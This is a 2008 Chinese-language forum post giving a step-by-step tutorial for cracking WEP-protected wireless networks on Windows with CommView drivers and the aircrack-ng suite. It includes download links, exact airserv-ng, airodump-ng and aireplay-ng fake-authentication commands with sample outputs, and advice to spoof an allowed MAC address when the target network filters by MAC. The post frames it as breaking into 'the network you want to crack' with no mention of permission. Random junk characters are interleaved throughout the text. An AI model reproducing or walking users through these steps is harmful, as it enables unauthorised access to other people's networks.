上等兵
- 注册时间
- 2008-7-25
- 金币
- 63 个
- 威望
- 5 个
- 荣誉
- 0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
|
使用airrack和注射式攻击来破解WEPA首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动. ) s# W4 F; D4 N8 n* B! A
A1如果你的网卡被commview支持的话,那么点下面的地址下载驱动:
9 O3 Y, ]# I+ _- Q* G$ {, mhttp://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip& Q- d3 D u# d0 u% |
A2 如果不被commview支持的网卡则可以下载widpackets的驱动:
4 h! }5 M/ o5 qhttp://www.wildpackets.com/support/downloads/drivers/ I* }5 Z7 C$ g8 r; ~
注意:下面的教程是在你正确安装commview的驱动的前提下进行的!
# C5 s8 G* a: h* O" IB 你需要下载这个.dll文件(只适用于commview 的网友):
' R9 w; A% m! ]$ h; h xhttp://darkircop.org/commview.dll: x4 P+ _ V8 d
) G- R- ^5 \4 [8 C
C 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip 9 x, w( Y8 |4 t5 f
+ ?" ?8 ?: `) F8 h1 m6 z9 @+ a1 P( {D 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘 l" U6 c Q! v/ {! U% \6 R
/ p* d+ c6 X. x' GE 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\
* {- W' t; f+ X. L% t; h/ U$ |. q" ]1 Y( M
F 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).! W9 ~5 ^; F; }. o) e4 g
8 k, ~# j0 ?, w& a% F
当你完成以上准备以后,就可以开始正式的破解了!# `* L4 x$ P# |5 X
原文提供的连接无法下载; V$ c$ S4 q! N1 o0 F( R4 V
) w/ a. t2 y4 w
特提供以上文件的合成包供下载
- M4 ]& R/ H# ?: i* ~2 s密码:password( y! q% x5 {+ m g* R' l' W4 i
. m4 Z% P) ` ]2 u, M破解: & [- J9 `2 L' A" G- ]$ a5 w$ t. }
1:打开一个命令提示符 (开始 > 运行 > cmd.exe)
' y3 f5 @! g& W( _
- J# H( U( G. _0 p; z2:在命令提示符窗口下面输入:
" Z: m/ J7 G0 }) M. b& I Cd c:\aircrack
I" X" J- ]- [- e% @+ [9 Q-按下回车' \' `0 J& H* ^7 i0 |: {
. H- N( T4 ]( z% F
3 在命令相同的提示符窗口下面输入:
; g4 p E5 R- s# K- a, P& N airserv-ng -d commview.dll
F5 q H9 Z+ `3 \9 y6 y-按下回车 7 J8 P! ^" V) N
你看到的回复应该跟下面一样:% @: L) o; o1 l
) H0 M D; ~2 Z) l/ ^3 y; {Opening card commview.dll ; } @ n+ d1 v, \* t
Setting chan 1
) Z# r, b: z$ F' `/ V/ U' @. D: dOpening sock port 666
L* ]' I% k$ n4 T- lServing commview.dll chan 1 on port 666% A4 ~5 |. a8 K3 T" T
& L0 p4 Q& U3 E
如果你没有看到上面的结果的话,而是看到下面的结果的话:# \ |; a9 B& @+ q9 _3 o9 O+ G
: ]3 [/ k- m5 _注意这里可能会有两种情况出现!!!!!:( \5 a6 _' b& I, w
) Q4 P+ W# T( O8 U
(1)3 P$ W) E8 i2 }& Q. ]+ Y
"Opening card commview.dll 6 G% V2 b6 P# @, A
Adapter not found
" _' n& A) S& k# \7 Dget_guid()
4 p) s& G' E! U" ^$ A) L8 B' xairserv-ng: wi_open(): No error") Z# B) K1 ]' @% c
; p3 q( @4 {7 w
这种情况那么你可以试试这个命令:
6 D+ G& W! `& b v, w) ~2 G) N+ q g+ h* P' n0 z' d
airserv-ng -d "commview.dll|debug"
\6 P/ v" Y' `; v( t
9 N! O2 a* v$ d然后你可能会看到下面的结果' }0 F$ O. W: `3 v8 B! V9 f' f
+ f/ C9 `$ `' R3 p1 Y8 U. YOpening card commview.dll|debug 1 c5 r- h! E8 B
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470 ?+ ?* W* z& ?# d% c+ [4 i- F6 ?
get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
5 ]0 w' a3 L' w4 WmboCard Gold - Paketplaner-Miniport 8 V* s+ `/ i! h
Adapter not found
. T' v1 y0 y7 J9 E& v5 ]get_guid() 2 h8 i6 J4 L* O7 W- X& O! P
airserv-ng: wi_open(): No error/ M4 B6 f6 i+ E1 F& J# f
: F1 i; i7 q& q0 m, V" m; J2 `' N那么你只要输入下面的命令就可以了
8 s/ z& ^! x; o
) ^0 d+ o# G) D; }7 z9 |$ {airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"
+ k7 s0 R( P0 I1 O+ ]7 ]: j' @: ]; {6 \0 o- s
或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了3 _/ ]( ? g* d0 @& f
+ F, ? S- d$ n(2)! G2 M" ^9 E5 W( |9 h
"Opening card commview.dll 8 V3 o# w! ^4 X
F1
Y1 y# _3 @% K4 C6 j$ ainit_lib()
: v: u/ X+ j4 C, }6 E5 E! \airserv-ng: wi_open(): No error"8 C' [. {* J& _( r
8 c$ F7 B9 \) |+ \9 `( i r2 |这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.
. l, m3 G1 q0 Y) c, u$ @
' S& N( u9 T( s- ]* z) A6 _& I4
, Z2 Q7 a7 L& t' N" F' Y-注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!!
$ Y8 M1 G) c- v8 c- F-在窗口2输入命令如下:
6 a9 l' Z. k- ~# [! u" ]4 l$ B" f cd c:\aircrack\/ J' @. q$ H1 b0 x' i" c
按回车
) A6 Q2 e' E: b8 }2 v- e; i* T1 d5 Z! l" k
5
0 \1 q/ J" }. S1 A-在窗口2输入命令如下: 8 O1 b5 D' v! U4 ], m' h% J
airodump-ng 127.0.0.1:666
: V1 y. g9 B/ R8 s2 y ]; r0 `回车8 d0 C# j& E0 m% @/ }
; R$ y2 l: w# N0 I9 p6 ~/ d提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!:
1 U e2 E' ]4 Z' D( B# `1 K
: \& d6 ^- \- pairodump-ng --channel 你的频道号 127.0.0.1:666
, o2 i' ]; u; O 比如说我需要监视的频道是6,那么命令如下) o7 X k( r# i* |
) a' H& E8 l! x/ u3 g7 d
airodump-ng --channel 6 127.0.0.1:666
$ Y Q4 q) g E1 v+ G' w, c% K5 y
/ |( @, B8 s; V6 x+ K2 b2 Q8 \( r5 _好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度.
% Q, {; d2 {$ u* X; m2 U. ]4 E6
, i; H0 f; I& d4 a/ `5 u6 J现在重新开一个新的命令提示符窗口(窗口3),不要关掉前面的(窗口1)和(窗口2)!!! e6 Q; a1 f+ \% a* K- F. [0 n* ?7 w
-在窗口3输入命令如下:& q2 d1 H( c5 Q4 g4 u
cd c:\aircrack\5 n+ Q d: ~8 }' J
按回车4 Z! D1 ?9 ^# g6 x4 a6 _
7
2 ^9 L$ x, {% \/ l在窗口3输入后面的命令:
4 n; f$ X2 @) G3 | naireplay-ng -1 0 -e 你想破解网络的ESSID -a 你想破解网络的BSSID -h 你用来监视的网络的网卡MAC 127.0.0.1:666
. R) \3 i, o& n9 U/ {实例:7 V7 Q7 `2 Q o3 D) j
ESSID = wifi16 + ^" Z1 B s) V2 c7 ?* `
BSSID = 11:22:33:44:55:66 # U2 T. K0 h5 k) E5 h+ I$ ?2 X$ k( f
MAC = 01:23:45:67:89:017 Z$ P @7 V2 w4 l& ~) L* u
提示:- m- @5 ?& a( i9 s$ V8 F* }+ j- n
你想破解网络的ESSID = 破解网络的名字 (wifi16, mynetwork)% I) C3 I. l+ z- G9 c1 b \# v: m
你想破解网络的BSSID = 破解网络的MAC (11:22:33:44:55:66)7 k% t9 B4 h" q
你用来监视的网络的网卡MAC = 这个就是你的网卡MAC咯
% _* U2 H+ [$ K) r4 D, u+ J) V那么命令行应该是:5 f4 m; I7 E; a t/ N" c7 w2 k; y
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666. J/ I" y4 O' P
如果一切正常的话那么你会得到下面的回复:
# J, j3 a# J, I4 i- q% n: N; @Sending Authentication Request , F9 M6 F+ M/ p2 m
Authentication successful 5 U' [$ j/ E b. O! z9 X6 I6 Z
Sending Association Request 3 o T! y4 L9 v5 v0 e
Association successful
- j" b2 D) y1 @0 r如果你得到:6 u5 ?9 O4 y- K
AP rejects the source MAC address, A+ F7 c& ?& ~
这说明你破解的网络只允许特定的MAC 访问,那你你需要把你的MAC地址改成破解网络允许的地址.6 T# w; D7 f/ X; q, o6 r
如果你持续得到:
/ i, p/ {7 H0 Q' I( Z) f2 Nsending authentication request) \2 O& i0 N6 ?
那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.
1 }6 \, ~; L5 a5 h7 q8 G9 J& z% Y1 |
[ 本帖最后由 fzulib 于 2008-9-5 16:01 编辑 ] |
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2008-9-1 10:13
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
